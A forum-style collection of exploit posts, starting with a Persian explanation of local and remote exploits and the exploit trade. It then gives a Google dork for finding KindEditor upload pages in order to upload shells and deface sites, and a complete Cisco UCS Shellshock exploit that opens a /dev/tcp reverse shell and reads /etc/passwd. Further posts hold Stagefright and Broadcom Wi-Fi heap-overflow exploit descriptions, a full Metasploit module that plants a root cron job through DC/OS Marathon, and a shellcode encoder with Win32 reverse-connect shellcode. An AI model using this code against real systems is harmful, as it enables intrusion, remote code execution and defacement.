میشوند : اکسپلویت های لوکال اکسپلویت های ریموت اکسپلویت های Local نیاز به دسترسی قبلی به سیستم قربانی دارد و بعد از ایجاد دسترسی اولیه که ممکن است از آسیب پذیری های تحت وب دیگر به دست آمده باشد مورد استفاده قرار میگیرد که منجر به ارتقاء سطح دسترسی کاربر را به مدیر (ادمین) فراهم میکنند. اکسپلویت های Remote از آسیب پذیری های برنامه های کاربردی (Aplicattion) استفاده کرده و منجر به نفوذ به شبکه میشوند و معمولا دسترسی های غیر مجاز با سطوح مختلف بسته به نوع آسیب پذیری را ایجاد میکنند. اکسپلویت ها معمولا بصورت سورس و کد منتشر میشوند که میتوانند در سیستم عامل های مختلف مورد استفاده قرار گیرند، و نیاز به کامپایل دارند، معمولا هکرها همه کامپایلرهای زبان های مختلف را در سیستم خود دارند و کامپایلرها جزئی جدا نشدنی از ابزارهای هک برای هکرها محسوب میشوند. Security Reserchers کیست؟ (پژوهشگرها یا محققین امنیتی) باگ ها و حفره های امنیتی توسط این افراد کشف و گزارش میشوند که منجر به نوشته شدن کدهای مخرب و اکسپلویت ها، برای آسیب پذیری های کشف شده میشوند، بعضا خود این افراد اقدام به کد نویسی و انتشار آن در سایتهای امنیتی برای اثبات آسیب پذیری و گاهی اوقات برای معروفیت خود مینمایند، عمده این محققین جوان و جویای نام بوده و حفره های امنیتی خطرناک که باعث رخداد های بزرگ امنیتی جهانی میشوند، توسط این جوانهای هکر کشف و مورد استفاده قرار میگیرند. منافع اقتصادی اکسپولیت و اکسپلویت نویسی امروزه خرید و فروش این کدها بصورت یک تجارت درآمده است، برخی Resercher ها نیز از علم خود برای منافع اقتصادی و تجاری استفاده میکنند، باگ های و حفره های امنیتی را کشف و به فروش میرسانند، این باگ ها که توسط هکرهای هدف دار خریداری میشوند گاه تا چندین میلیون و یا چند صد میلیون تومان قیمت گذاری میشوند.
  18. دوستان داشتن دروک نویسی میکردم که یک موضوع جالبی مرا درگیر کرد وقتی داشتم دروک مینوشتم یهویی یک دروکی را پیدا کردم که اپلودر سایت را دور میزند یعنی میتوانید شل اسکریپت خود را اپلود کنید و سایت را دیفیس نمایید. inurl kindeditor/examples/uploadbutton.html دروک به شرح بالا فعلا اسمی به باگ پیدا نکرده ام فک کنم از نوع باگ fcsk میباشد که ادمین اپلودر را بایپس میکند !
  19. #!/usr/bin/python ############################################### # Cisco UCS Manager 2.1(1b) Shellshock Exploit # # CVE-2014-6278 # Confirmed on version 2.1(1b), but more are likely vulnerable. # Cisco's advisory: # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash # Exploit generates a reverse shell to a nc listener. # Exploit Author: @thatchriseckert ############################################### import sys import requests import time if len(sys.argv) < 4: print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit" print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>" print "[*]" print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444" print "[*] Listener: nc -lvp <port>" print "\n" sys.exit() #Disables request warning for cert validation ignore. requests.packages.urllib3.disable_warnings() ucs = sys.argv[1] url = "https://" + ucs + "/ucsm/isSamInstalled.cgi" attackhost = sys.argv[2] revshellport = sys.argv[3] headers1 = { 'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1' } headers2 = { "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)' } def exploit(): try: r = requests.get(url, headers=headers1, verify=False, timeout=5) except Exception, e: if 'timeout' in str(e): print "[+] Success. Enjoy your shell..." else: print "[-] Something is wrong..." print "[-] Error: " + str(e) def main(): try: r = requests.get(url, headers=headers2, verify=False, timeout=3) if r.content.startswith('\nroot:'): print "[+] Host is vulnerable, spawning shell..." time.sleep(3) exploit() else: print "[-] Host is not vulnerable, quitting..." sys.exit() except Exception, e: print "[-] Something is wrong..." print "[-] Error: " + str(e) if __name__ == "__main__": main()
  20. Source: https://github.com/NorthBit/Metaphor Metaphor - Stagefright with ASLR bypass By Hanan Be'er from NorthBit Ltd. Link to whitepaper: https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf Twitter: https://twitter.com/High_Byte Metaphor's source code is now released! The source include a PoC that generates MP4 exploits in real-time and bypassing ASLR. The PoC includes lookup tables for Nexus 5 Build LRX22C with Android 5.0.1. Server-side of the PoC include simple PHP scripts that run the exploit generator - I'm using XAMPP to serve gzipped MP4 files. The attack page is index.php. The exploit generator is written in Python and used by the PHP code. usage: metaphor.py [-h] [-c CONFIG] -o OUTPUT {leak,rce,suicide} ... positional arguments: {leak,rce,suicide} Type of exploit to generate optional arguments: -h, --help show this help message and exit -c CONFIG, --config CONFIG Override exploit configuration -o OUTPUT, --output OUTPUT Credits: To the NorthBit team E.P. - My shining paladin, for assisting in boosting this project to achieve all the goals. Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39640.zip
  21. Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1046 https://googleprojectzero.blogspot.ca/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. One of the events handled by the BCM firmware is the processing of TDLS connections (802.11z). TDLS connections allow clients to exchange data between one another without passing it through the AP (thus preventing congestion at the AP). In order to verify the integrity of TDLS messages, each message exchanged between the TDLS peers includes a message integrity code (MIC). The MIC is calculated using AES-CMAC with a key derived during the setup process (TPK-KCK). When a TDLS Teardown Request frame is sent by either one of the peers in an established TDLS connection, the receiving client must verify the MIC before processing the request. The MIC for TDLS teardown requests is calculated as follows: AES-CMAC(TPK-KCK, LinkID-IE || ReasonCode || DialogToken || TransactionSeq || FastTransition-IE) (see "wpa_tdls_key_mic_teardown" under https://w1.fi/cgit/hostap/plain/src/rsn_supp/tdls.c) It should be noted that all TDLS connections are accepted automatically from any peer and are handled solely by the BCM firmware (meaning there is no need for user interaction or involvement in any way - once a TDLS Setup Request is received by the firmware, it will proceed with the TDLS handshake and subsequently create a TDLS connection with the requesting peer). When the BCM firmware receives a TDLS Teardown frame, it first verifies the Link-ID information element in order to make sure it matches the current link information. Then, if the Link ID is valid, it calls the "wlc_tdls_cal_teardown_mic_chk" function in order to verify the MIC of the request. The function starts by extracting the Fast Transition IE information element (FTIE - number 55). Then, if the IE is present, its contents are copied into a heap-allocated buffer of length 256. The copy is performed using the length field present in the IE, and at a fixed offset from the buffer's start address. Since the length of the FTIE is not verified prior to the copy, this allows an attacker to include a large FTIE (e.g., with a length field of 255), causing the memcpy to overflow the heap-allocated buffer. Here's the high-level logic of the "wlc_tdls_cal_teardown_mic_chk" function: uint8_t* buffer = malloc(256); ... uint8_t* linkid_ie = bcm_parse_tlvs(..., 101); memcpy(buffer, linkid_ie, 0x14); ... uint8_t* ft_ie = bcm_parse_tlvs(..., 55); memcpy(buf + 0x18, ft_ie, ft_ie[1] + 2); (Note that each IE is a TLV; the tag and value fields are each a single byte long. Therefore, ft_ie[1] is the IE's length field). It should also be noted that the heap implementation used in the BCM firmware does not perform safe unlinking or include heap header cookies, allowing heap overflows such as the one described above to be exploited more reliably. I'm attaching a patch to wpa_supplicant 2.6 which modifies the TDLS Teardown frame sent by the supplicant in order to trigger the heap overflow. You can reproduce the issue by following these steps: 1. Download wpa_supplicant 2.6 from https://w1.fi/releases/wpa_supplicant-2.6.tar.gz 2. Apply the included patch file 3. Build wpa_supplicant (with TDLS support) 4. Use wpa_supplicant to connect to a network 5. Connect to wpa_cli: 5.1. Setup a TDLS connection to the BCM peer using "TDLS_SETUP <MAC_ADDRESS_OF_PEER>" 5.2. Teardown the connection using "TDLS_TEARDOWN <MAC_ADDRESS_OF_PEER>" (Where MAC_ADDRESS_OF_PEER is the MAC address of a peer with a BCM SoC which is associated to the same network). At this point the heap overflow will be triggered. The code in the patch will corrupt the heap, causing the remote BCM SoC to reset after a while. I've been able to verify this vulnerability on the BCM4339 chip, running version 6.37.34.40 (as present on the Nexus 5). However, I believe this vulnerability's scope includes a wider range of Broadcom SoCs and versions. patch ################################################################################ Attaching exploit - running exploit.py results in arbitrary code-execution on the Wi-Fi dongle. Here is a high-level overview of the exploit: 1. Create a TDLS connection to the target device 2. Teardown the connection using a crafted "TDLS Teardown Request" frame, triggering the overflow 3. Create a new TDLS connection, using crafted arguments causing a situation where two chunks in the freelist overlap one another 4. Send a TDLS frame with action code 127 4.1. Craft the size of the TDLS frame s.t. it overlaps the other chunk in the freelist 4.2. Craft the contents in order to point the free chunk to the location of a periodic timer which was created during the firmware's initialization 5. Send another TDLS frame with action code 127 5.1. Craft the size of the TDLS frame s.t. it will be placed on top of the timer object 5.2. Craft the contents in order to replace the timer's data structures, allowing us to point the timer's handler function at any arbitrary address. In this case, we point the handler function at an address near the heap's end 6. Send a large TDLS frame with action code 127 6.1. Craft the frame's contents so that it contains the shellcode we'd like to execute 7. Since the heap is zero-initialized, and "00 00" is NOP (MOVS R0,R0) in Thumb, this means that jumping to a location slightly before our created code chunk is fine, as it won't cause any adverse affects until we reach our code blob. Putting all this together, Once the timer expires, our code chunk is executed on the firmware Note that sending crafted "TDLS Teardown Request" frames requires modifications to wpa_supplicant. Moreover, sending TDLS frames with action code 127 requires modifications to both wpa_supplicant and to the Linux Kernel (mac80211). These changes (and instructions on how to apply them) are included in the exploit archive attached to this comment. TDLSExploit-1.tar.gz ################################################################################ Attaching updated exploits for both the Nexus 5 (MRA58K, BCM4339 6.37.34.40) and the Nexus 6P (NUF26K, BCM4358 version 7.112.201.1). TDLSExploit-2.tar.gz ################################################################################ Adding firmware heap visualisers. -create_dot_graph.py - Creates a "dot" graph containing the heap's free-chunks -create_html_main_chunk.py - Creates an HTML visualisation of the heap's main region -create_html_total.py - Created an HTML visualisation of the entire heap -create_trace_html.py - Creates an HTML visualisation for traces from the malloc/free patches -profiles.py - The symbols for each firmware "profile" -utils.py - Utilities related to handling a firmware snapshot BCMHeapVisualisers.tar.gz ################################################################################ Adding script to dump the timer list from a firmware snapshot. dump_timers.py ################################################################################ Adding script to dump PCI ring information from firmware snapshot. dump_pci.py ################################################################################ Adding inline firmware patcher. -patch.py - The patcher itself. -apply_* - Scripts to apply each of the patches using dhdutil -<DEV>/BCMFreePatch - Patch for the "free" function in the firmware -<DEV>/BCMMallocPatch - Patch for the "malloc" function in the firmware -<DEV>/BCMDumpMPU - Patch that dumps the MPU's contents BCMPatcher.tar.gz Proofs of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41805.zip
  22. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'DC/OS Marathon UI Docker Exploit', 'Description' => %q{ Utilizing the DCOS Cluster's Marathon UI, an attacker can create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container. As the docker container executes command as uid 0 it is honored by the host operating system allowing the attacker to edit/create files owed by root. This exploit abuses this to creates a cron job in the '/etc/cron.d/' path of the host server. *Notes: The docker image must be a valid docker image from hub.docker.com. Further more the docker container will only deploy if there are resources available in the DC/OS cluster. }, 'Author' => 'Erik Daguerre', 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'], ], 'Targets' => [ [ 'Python', { 'Platform' => 'python', 'Arch' => ARCH_PYTHON, 'Payload' => { 'Compat' => { 'ConnectionType' => 'reverse noconn none tunnel' } } } ] ], 'DefaultOptions' => { 'WfsDelay' => 75 }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 03, 2017')) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]), OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]), OptString.new('CONTAINER_ID', [ false, 'container id you would like']), OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ]) ]) end def get_apps res = send_request_raw({ 'method' => 'GET', 'uri' => target_uri.path }) return unless res and res.code == 200 # verify it is marathon ui, and is returning content-type json return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json' apps = JSON.parse(res.body) apps end def del_container(container_id) res = send_request_raw({ 'method' => 'DELETE', 'uri' => normalize_uri(target_uri.path, container_id) }) return unless res and res.code == 200 res.code end def make_container_id return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil? rand_text_alpha_lower(8) end def make_cmd(mnt_path, cron_path, payload_path) vprint_status('Creating the docker container command') payload_data = nil echo_cron_path = mnt_path + cron_path echo_payload_path = mnt_path + payload_path cron_command = "python #{payload_path}" payload_data = payload.raw command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n" command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n" command << "echo \"\" >> #{echo_cron_path}\n" command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n" command << "sleep 120" command end def make_container(mnt_path, cron_path, payload_path, container_id) vprint_status('Setting container json request variables') container_data = { 'cmd' => make_cmd(mnt_path, cron_path, payload_path), 'cpus' => 1, 'mem' => 128, 'disk' => 0, 'instances' => 1, 'id' => container_id, 'container' => { 'docker' => { 'image' => datastore['DOCKERIMAGE'], 'network' => 'HOST', }, 'type' => 'DOCKER', 'volumes' => [ { 'hostPath' => '/', 'containerPath' => mnt_path, 'mode' => 'RW' } ], }, 'env' => {}, 'labels' => {} } container_data end def check return Exploit::CheckCode::Safe if get_apps.nil? Exploit::CheckCode::Appears end def exploit if get_apps.nil? fail_with(Failure::Unknown, 'Failed to connect to the targeturi') end # create required information to create json container information. cron_path = '/etc/cron.d/' + rand_text_alpha(8) payload_path = '/tmp/' + rand_text_alpha(8) mnt_path = '/mnt/' + rand_text_alpha(8) container_id = make_container_id() res = send_request_raw({ 'method' => 'POST', 'uri' => target_uri.path, 'data' => make_container(mnt_path, cron_path, payload_path, container_id).to_json }) fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201 print_status('The docker container is created, waiting for it to deploy') register_files_for_cleanup(cron_path, payload_path) sleep_time = 5 wait_time = datastore['WAIT_TIMEOUT'] deleted_container = false print_status("Waiting up to #{wait_time} seconds for docker container to start") while wait_time > 0 sleep(sleep_time) wait_time -= sleep_time apps_status = get_apps fail_with(Failure::Unknown, 'No apps returned') unless apps_status apps_status['apps'].each do |app| next if app['id'] != "/#{container_id}" if app['tasksRunning'] == 1 print_status('The docker container is running, removing it') del_container(container_id) deleted_container = true wait_time = 0 else vprint_status('The docker container is not yet running') end break end end # If the docker container does not deploy remove it and fail out. unless deleted_container del_container(container_id) fail_with(Failure::Unknown, "The docker container failed to start") end print_status('Waiting for the cron job to run, can take up to 60 seconds') end end
  23. /* ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// Alphanumeric Shellcode Encoder Decoder Copyright © 1985-2008 Avri Schneider - Aladdin Knowledge Systems, Inc. All rights reserved. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/gpl-3.0.html>. +-----------+ WORKS CITED +-----------+ +--------------------------------------------------------------------------------------------------+ |Matt Conover, Soren Macbeth, Avri Schneider 05 October 2004 | |Encode2Alnum (polymorphic alphanumeric decoder/encoder) | |Full-Disclosure <http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/027147.html> | | | |CLET Team. Aug. 2003 | |Polymorphic Shellcode Engine | |Phrack <http://www.phrack.org/show.php?p=61&a=9> | | | |Ionescu, Costin. 1 July 2003 | |Re: GetPC code (was: Shellcode from ASCII) | |Vuln-Dev <http://www.securityfocus.com/archive/82/327348> | | | |rix. Aug. 2001 | |Writing ia32 alphanumeric shellcodes | |Phrack <http://www.phrack.org/show.php?p=57&a=15> | | | |Wever, Berend-Jan. 28 Jan. 2001 | |Alphanumeric GetPC code | |Vuln-Dev <http://www.securityfocus.com/archive/82/351528> | |ALPHA3 <http://skypher.com/wiki/index.php?title=ALPHA3> | +--------------------------------------------------------------------------------------------------+ ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// */ #include <time.h> #include <stdio.h> #include <windows.h> #define MAX_BYTES 0x100 #define MAX_ENCODED_SHELLCODE 2000 //this will be allocated on the stack #define MIN_IP_STR_LEN 7 #define MAX_IP_STR_LEN 15 #define OFFSET_XOR_AL1_A 15 #define OFFSET_XOR_AL1_B 18 #define OFFSET_XOR_AL2_A 37 #define OFFSET_XOR_AL2_B 40 #define OFFSET_PUSH_DWORD1 0 #define OFFSET_PUSH_DWORD2 1 #define OFFSET_PUSH_DWORD3 4 #define OFFSET_PUSH_DWORD4 12 #define OFFSET_RANDOMIZED_DECODER_HEAD 14 #define SIZE_RANDOMIZED_DECODER_HEAD 16 BYTE EncodedShellcode[] = // encoded 336 bytes "PZhUQPTX5UQPTHHH4D0B8RYkA9YA3A9A2B90B9BhPTRWX5PTRW4r8B9ugxPqy8xO" "wck4WTyhlLlUjyhukHqGCixVLt4UTCBRwsV3pRod8OLMKO9FXJVTJJbJX4gsVXAt" "Q3ukAxFmVIw7HyBfDyNv5zXqg4PQeTxZJLm56vRjSidjSz75mHb2RL5Hl30tUmnH" "HtXEv7oZVdiEv1QwWijcgVk4CZn7NI3uRai32AZ7FS0Iq1cwWc5T5RlnTIiKJVmq" "4T4MElucobfP4vWyB0OfB34JRJ9T4zjLlbKmlk7jTicj11869F001uAdTZKNJ7wL" "mOv5mLlGPKFLtNI2525WhktKDO0NIlseHIuJ33xv7xGQAW55eZKXHw78zfvCI2U0" "9Ulw5ZZhynmxG7JZZgJAYbg1MEp5QcOv7AYkYfcHQDWVMlJnzOSh8nzg1NZZn5Px" "11U5INVEtvZOS1E094HqmbB6K1MfRIq7KQyNOeL7NHI1Xnwhyhy69bg2bTexGnkc" "CEt90vn3DaFxGaFuRIPg0NK40kdg0L9ImaFbGy1Wl7JyGeJByHdfRCSYzvCzVa2v" "RtQWG5lxRMN1CZREvyKFvfwij3X2P81J1wk9ZLmGAqxGPuQv7RBX411iaWKCLGnD" "kwRZKREaRis5V7c5ILxKfAx6MbH40T53PnX9ZwSWtYzbHwCzkS0Ev5iVmLmS3xSk" "1telLPYuGyNvX1TyJ3yLdOwckr"; // example: make encoder choose more uppercase bytes... #define ADDITIONAL_CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ" #define ALNUM_CHARSET ADDITIONAL_CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" // <--- allowed charset // feel free to //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////change - YMMV #define REGISTER_WITH_ADDRESS_OF_SHELLCODE esp // <--- change this to the register holding the address of the decoder//////////// #define _Q(str) #str #define Q(str) _Q(str) #define P(str) #str ##" // <--- buffer offset\n"## _Q(str) /////////////////////////////////// #define CONNECT_BACK_SHELLCODE // //#undef CONNECT_BACK_SHELLCODE //undefine CONNECT_BACK_SHELLCODE to use your own - and place it in shellcode[] >-----------------. /////////////////////////////////////////////////////////////////// | int main(); // | UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length); // | UCHAR get_push_register_instruction(UCHAR *reg); // | UCHAR get_random_alnum_value(); // | UCHAR get_random_alnum_push_dword_opcode(); // | UCHAR *get_nop_slide(UINT size, UINT slide); /////// | UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);// | UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide); // | UCHAR *shuffle(UCHAR str[], UINT length); /////// | DWORD my_htonl(DWORD dw_in); // | DWORD ip_str_to_dw(UCHAR *str); // | BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key); // | BOOL is_alnum(UCHAR c); // | BOOL str_is_alnum(UCHAR *str); // | UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index); // | UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1); // | struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c); // | struct xor2_key *choose_random_node(struct xor2_key *head); // | void free_p_xor2_key(struct xor2_key *node); // | // | struct xor2_key { // | UCHAR xor2; // | UCHAR key; // | struct xor2_key *prev; // | struct xor2_key *next; // | } xor2_key; // | // | // | // Title: Win32 Reverse Connect // | // Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 // | // Author: hdm[at]metasploit.com // | #ifdef CONNECT_BACK_SHELLCODE // | #define OFFSET_IP_ADDRESS 154 // | #define OFFSET_TCP_PORT_NUMBER 159 // | #define IP_ADDRESS "127.0.0.1" // | #define TCP_PORT_NUMBER 123 // | DWORD ip_address; // | UCHAR shellcode[] = // | "\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa" // | "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2" // | "\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e" // | "\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64" // | "\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57" // | "\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a" // | "\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8" // | "\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90" // | "\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57" // | "\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68" // | "IPIP" // I.P. address // | "\x68" // | "PORT" // TCP port number // | "\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44\x8d\x3c\x24" // | "\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d" // | "\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10" // | "\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00\x51\xff\x55" // | "\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24\x57\xff\x55" // | "\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b" // | "\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49" // | "\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1" // | "\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01" // | "\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb" // | "\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00"; // | #else ////////////////////////////////////// | UCHAR shellcode[] = "\xCC YOUR SHELLCODE GOES HERE \xCC"; // <----------------- here ------------------------------------------' #endif // DWORD size = sizeof(shellcode)-1; // // int main() { ///////////////////////////////////////////////////////// //(decoder address is in ecx when decoder starts) // UCHAR PUSH_REGISTER_WITH_DECODER_ADDRESS = get_push_register_instruction(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)); // >----------. // // | #define END_OF_ENCODED_SHELLCODE 'A','L','D','N' // this is the terminating string of the encoded shellcode // | UCHAR str_end_of_encoded_shellcode[]= {END_OF_ENCODED_SHELLCODE}; //////////////////////////////////////////////// | UCHAR xor_al1 = get_random_alnum_value(); // this is used to zero out AL the first time | UCHAR xor_al2 = get_random_alnum_value(); // this is used to zero out AL the second time | int offset_imul_key = '\xC1';//////////////////////// | int jne_xor1 = '\xC2';// >---------------------------------------------------------. | int jne_xor2 = '\xC3';// >--------------------------------------------------------------| | // you would need to play with these two values if you want to reduce | | // the size of the NOP slides - they obviously need to stay alnum. | | // You could also play with the value of AL before the XOR is done | | // to get your desired negative offset. keep in mind that it will cost | | // you instructions to get al to the value you want (if you use xor of | | // two alphanumeric bytes, you would need to push first alphanumeric | | // char to the stack, pop eax, then xor it with it's alnum complement) | | // This playing around would result in an even harder to detect decoder | | // as the offsets would be different | | int size_decoder ='\xC4'; // | | int half_size_decoder ='\xC5'; //////////////////////////////////////////////////////////////////// | | UCHAR imul_instruction_1 ='\x6B'; // | | UCHAR imul_instruction_2 ='\x41'; // | | UCHAR imul_instruction_3 ='\xC6'; //size of decoder+1 // | | UCHAR imul_instruction_4 ='\xC7'; //initial key (random alnum) // | | // // | | UINT column=0, i=0; /////////////////////////////// | | UCHAR *alnum = ALNUM_CHARSET; // | | UCHAR *p_alnum = alnum; // | | UCHAR decoder[] = // | | { //////////////////////////////////////////////////////////////////////////////// | | // | | //[step_1] -- multiply first encoded byte with key | | //[step_2] -- xor result of step_1 with second encoded byte to get the decoded byte | | // | | // Each binary byte is encoded into three alphanumeric bytes. | | // The first byte multipled by the third byte xor'ed against the second byte yeilds the original | | // binary byte. | | // | | // TODO: | | // .--(first byte ^ second byte) * third byte | | // '--(second byte ^ first byte) * third byte | | // | | // .--(first byte ^ third byte) * second byte | | // '--(third byte ^ first byte) * second byte | | // | | // .--(second byte ^ third byte) * first byte | | // '--(third byte ^ second byte) * first byte | | // | | // .--(first byte * second byte) ^ third byte | | // '--(second byte * first byte) ^ third byte | | // | | // .--(first byte * third byte) ^ second byte <-- decoder/encoder implemented | | // '--(third byte * first byte) ^ second byte <-- decoder implemented (same encoder) | | // | | // .--(second byte * third byte) ^ first byte | | // '--(third byte * second byte) ^ first byte | | // | | // | | // The above is divided into pairs, each pair has the same values (in parenthesis) just at different offsets, | | // and we can switch them around with no effect. Each option requires a different decoder, but each pair can use the | | // same encoder. | | // | | /////////// DECODER HEAD (will be randomized by sliding instructions) //////// >----------------------------------|----|---. /* 1*/ '\x50', //push ??? (this can change) // [eax = address of decoder]------+ | | | /* 2*/ '\x50', //push ??? (this can change) // [ecx = address of decoder]------+ | | | /* 3*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (decoder address) // [edx = address of decoder]------+ | | | /* 4*/ PUSH_REGISTER_WITH_DECODER_ADDRESS, //push reg (base offset for cmp) // [ebx = address of decoder]------+ | | | /* 5*/ '\x50', //push ??? (this can change) // [esp = address of decoder]------+ | | | /* 7*/ '\x6A', half_size_decoder, //push 35h (word offset for cmp) // [ebp = decoder size / 2]--------+ | | | /*12*/ '\x68', END_OF_ENCODED_SHELLCODE, //push END_OF_ENCODED_SHELLCODE // [esi = 4 bytes terminating key]>+ | | | /*13*/ '\x50', //push ??? (this can change) // [edi = address of decoder]------+ | | | /*14*/ '\x61', //popad // [set all registers] <-----------' | | | /*16*/ '\x6A', xor_al1, //last decoder byte=0xB1 //push XOR_AL1 [JNE_XOR1^0xFF=al^JNE_XOR2=last byte==0xB1] >----. | | | /*17*/ '\x58', //pop eax <-------------------------------------------------' | | | /*19*/ '\x34', xor_al1, //xor al,XOR_AL1 [al = 0x00] | | | /*20*/ '\x48', //dec eax [al = 0xFF] [you can play with AL here...]<----' | | /*22*/ '\x34', jne_xor1, //xor al,JNE_XOR1 [al = 0xFF ^ JNE_XOR1] | | /*25*/ '\x30', '\x42', size_decoder-1, //xor byte ptr [edx+size],al >--change-last-byte--. | | /*26*/ '\x52', //push edx [save decoder address on stack] | | | /*27*/ '\x52', //push edx >----. | | | /*28*/ '\x59', //pop ecx <------' [ecx = address of decoder] | | | /*29*/ '\x47', //inc edi we increment ebx keeping the decoder | | | /*30*/ '\x43', //inc ebx length non-even (edi is unused) | | | //////////////// DECODER_LOOP_START /////////////////////////////////////////// | | | /*31*/ '\x58', //get address of the decoder //pop eax <---------. <--|-----------------. | | /*32*/ '\x52', //save edx //push edx [can use edx now]>---------------|----|---------------. | | | /*33*/ '\x51', //save ecx //push ecx [can use ecx now] >------------|----|-------------. | | | | /*34*/ '\x50', //save address of decoder //push eax [can use eax now] >---------|----|-----------. | | | | | /*35*/ '\x50', //save eax //push eax >----. | | | | | | | | /*36*/ '\x5A', //restore into edx //pop edx <------' | | | | | | | | /*38*/ '\x6A', xor_al2, //zero out al //push XOR_AL2 [al = 0] >----. | | | | | | | | /*39*/ '\x58', //zero out al //pop eax | | | | | | | | | /*41*/ '\x34', xor_al2, //zero out al //xor al,XOR_AL2 <----------' | | | | | | | | /*42*/ '\x50', //save al on the stack (al=0)//push eax >-----------------. | | | | | | | | /*45*/ '\x32', '\x42', offset_imul_key, //xor al,byte ptr [edx+off] | | | | | | | | | /*48*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >--this-zero's-the-key----. | | | | | | /*49*/ '\x58', //restore al from the stack (al=0)//pop eax <----------------------' | | | | | | | | | /*52*/ '\x32', '\x41', 